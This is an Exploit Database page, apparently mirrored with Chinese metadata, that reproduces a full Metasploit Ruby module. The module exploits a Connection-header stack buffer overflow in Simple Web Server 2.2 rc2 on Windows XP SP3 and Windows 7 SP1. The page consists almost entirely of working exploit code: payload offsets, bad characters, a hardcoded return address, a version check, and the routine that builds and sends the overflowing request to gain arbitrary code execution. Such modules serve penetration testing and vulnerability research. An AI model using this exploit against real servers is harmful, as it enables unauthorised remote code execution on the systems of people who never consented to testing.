Simple Web Server – Connection Header Buffer Overflow (Metasploit)

• Exploit Database
• 10 阅读

• 作者： Metasploit
  日期： 2012-07-23
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/20028/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # web site for more information on licensing and terms of use.
  # http://metasploit.com/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = NormalRanking
  
  	HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] }
  
  	include Msf::Exploit::Remote::HttpClient
  
  	def initialize(info={})
  		super(update_info(info,
  			'Name'=> "Simple Web Server Connection Header Buffer Overflow",
  			'Description' => %q{
  				This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user
  				can send a long string data in the Connection Header to causes an overflow on the
  				stack when function vsprintf() is used, and gain arbitrary code execution. The
  				module has been tested successfully on Windows 7 SP1 and Windows XP SP3.
  			},
  			'License'	=> MSF_LICENSE,
  			'Author'=>
  				[
  					'mr.pr0n', # Vulnerability Discovery and PoC
  					'juan' # Metasploit module
  				],
  			'References' =>
  				[
  					['EDB', '19937'],
  					['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/']
  				],
  			'Payload'	 =>
  				{
  					'BadChars' => "\x00\x0a\x0d",
  					'Space' => 2048,
  					'DisableNops' => true,
  					'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000
  				},
  			'DefaultOptions' =>
  				{
  					'EXITFUNC' => "process",
  				},
  			'Platform' => 'win',
  			'Targets'=>
  				[
  					[
  						'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1',
  						{
  							'Ret' => 0x6fcbc64b, # call edi from libstdc++-6.dll
  							'Offset' => 2048,
  							'OffsetEDI' => 84
  						}
  					]
  				],
  			'Privileged' => false,
  			'DisclosureDate' => "Jul 20 2012",
  			'DefaultTarget'=> 0))
  	end
  
  	def check
  		res = send_request_raw({'uri'=>'/'})
  		if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/
  			return Exploit::CheckCode::Vulnerable
  		end
  
  		return Exploit::CheckCode::Safe
  	end
  
  	def exploit
  
  		sploit = payload.encoded
  		sploit << rand_text(target['Offset'] - sploit.length)
  		sploit << [target.ret].pack("V") # eip
  		sploit << rand_text(target['OffsetEDI'])
  		sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string
  
  		print_status("Trying target #{target.name}...")
  
  		connect
  
  		send_request_cgi({
  			'uri'=> '/',
  			'version'=> '1.1',
  			'method' => 'GET',
  			'connection' => sploit
  		})
  
  		disconnect
  
  	end
  end